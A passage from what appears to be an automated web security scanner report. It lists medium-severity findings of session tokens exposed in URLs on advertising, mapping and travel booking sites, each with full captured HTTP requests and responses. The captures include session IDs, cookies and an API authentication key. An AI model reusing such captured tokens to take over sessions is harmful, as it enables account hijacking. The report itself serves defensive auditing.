<A HREF="http://gcm.chango.com/collector/relator?id=E1&amp;partnerId=&amp;referrerURL=&amp;token=b6ae888c-d95b-11e0-b096-0025900e0834">here</A>
...[SNIP]...

10.5. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.chango.com/collector/
...[SNIP]...

10.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1317586157554&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1317586664458& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M002303
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:30 GMT
Content-Length: 155

LogCredCB1317586664458({"sessionId" : "AuiPlePwo_oflytMscNY_RXyW2yQrF3qktQ3C7iY5lDdworXCyVwDP_XB0UJfFTV", "authenticationResultCode" : "ValidCredentials"})

10.7. http://gcm.chango.com/collector/relator

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://gcm.chango.com
Path:   /collector/relator

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: gcm.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _i_rc=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 35
Server: Chango RTB Server
Etag: "0f4e929dd5bb2564f7ab9c76338e04e292a42ace"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Connection: close

GIF89a.............,...........D..;

10.8. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...

10.9. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=7d351c60-8078-42ee-9ccb-be1d48290039&hostname=www.igougo.com&location=%2Ftraveldeals%2Fratefinder.aspx&url=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&sessionID=1317601622396.31525&fpc=3de0670-132c72d397d-d7082d6-1&ts1317601643777.0&refDomain=www.travelocity.com&refQuery=theDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 03 Oct 2011 00:27:27 GMT
Connection: keep-alive


10.10. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lb-static1-1568763564.us-east-1.elb.amazonaws.com
Path:   /pix.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pix.gif?acct_id=4079&ptype=other&cat=HOTEL&is_paid=0&prod_id=&prod_name=&search_term=&session_id=DFE4F06BE571072B&is_conversion=&basket_value=&order_id=&version=0.2&url=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&ref=http%3A%2F%2Fdrf-global.com%2Fservicegateway%2Fglobaltrips-shopping-svcs%2Fdrfadserver-1.0%2Fpub%2Frf%3Flob%3DHOTEL%26advertiserName%3Dorbitz%26grp%3D9705%26placeholderUrl%3Dhttp%253A%252F%252Fwww.travelocity.com%252Fvstrack%253FWA1%253D03020%2526WA3%253D742%2526WA5%253DDRFContinue%2526WA6%253Dair%2526dst%253Durl_placeholder%26url%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fclk%253B141652382%253B20702477%253Ba%253Fhttp%253A%252F%252Fwww.orbitz.com%252Fpsi%253Ftype%253Dhotel%2526market%253D%2524%257Bcity%257D%252C%2524%257Bcountryn%257D%2526checkin%253D%2524%257BdepartureDate%253Ad%253A%2522yyyy-mm-dd%2522%257D%2526checkout%253D%2524%257BreturnDate%253Ad%253A%2522yyyy-mm-dd%2522%257D%2526guests%253D%2524%257Badults%257D%2526rooms%253D%2524%257Brooms%257D%2526WT.mc_id%253Do_igo_merch_city_dated%2526WT.mc_ev%253Dclick%2526gcid%253DC11287x600-CY%2524%257Bcity%257D%252C%2524%257Bcountryn%257D%26pid%3Dc3919e40-e5b8-49f8-b876-4fed1f31968f%26sid%3Dbfa7dd53-c988-458c-86df-52443affccb8%26uid%3D20d9c1fc-61a4-45f0-9524-380e68994c01%26widget%3DH_PopUnder%26pti%3Ddefault%26src%3Dnone%26ppi%3D4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx%3D92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn%3D1%26cgn%3D153%26pos%3D0%26aii%3De3898191-1452-431e-82b6-c9f881ca9a4c%26%2524cc%3DUS%26%2524rc%3DUS%26%2524adults%3D1%26%2524destination%3DBoston%252C%2520MA%2520Massachusetts%26%2524gls&tr=1 HTTP/1.1
Host: lb-static1-1568763564.us-east-1.elb.amazonaws.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:12:03 GMT
ETag: "1104880613"
Last-Modified: Wed, 29 Jul 2009 00:45:42 GMT
Server: lighttpd/1.4.19
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

10.11. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i2096887&2i2096946&2e1&3u14&4m2&1u530&2u412&5m3&1e0&2b1&5sen&token=78185 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 03 Oct 2011 00:00:01 GMT
Expires: Tue, 04 Oct 2011 00:00:01 GMT
Server: staticmap
Content-Length: 138
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 759

.PNG
.
...IHDR.....................PLTE..............bKGD...-....2IDATx...1.......Om.............................>mp..uc.7....IEND.B`.

10.12. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=2&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=hotel200&mboxId=0&mboxTime=1317582605700&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 89
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel200',0).setOffer(new mboxOfferDefault()).loaded();

10.13. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=2&mbox=trip_landing_providers_onload&mboxId=0&mboxTime=1317584100695&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 184
Date: Mon, 03 Oct 2011 00:35:03 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_providers_onload',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");

10.14. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317584104035&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&campaign=1&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Mon, 03 Oct 2011 00:35:07 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

10.15. http://rs.gwallet.com/r1/pixel/x1743

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>

10.16. http://travel.travelocity.com/___waseq.img

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /___waseq.img

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.travelocity.com/&tntTitle=&tntReferrer=http%3A//www.travelocity.com/resolve/default&tntCampaignID=27980&tntCampaignName=HMP%20Cannonball%20TestID%20472%20%28Austin%29%20PROD&tntRecipeID=2&tntRecipeName=Page%20472a&tntTrafficType=0&tntOfferID=129900&tntMbox=HMP&tntPCID=1317600481056-80236.19&tntSessionID=1317600481056-80236&tntFirstSession=true&tntPageID=1317600481056-80236&tntTime=1317600482344 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:05 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://i.travelocity.com/t.gif
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


10.17. http://travel.travelocity.com/hotel/HotelAvailability.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
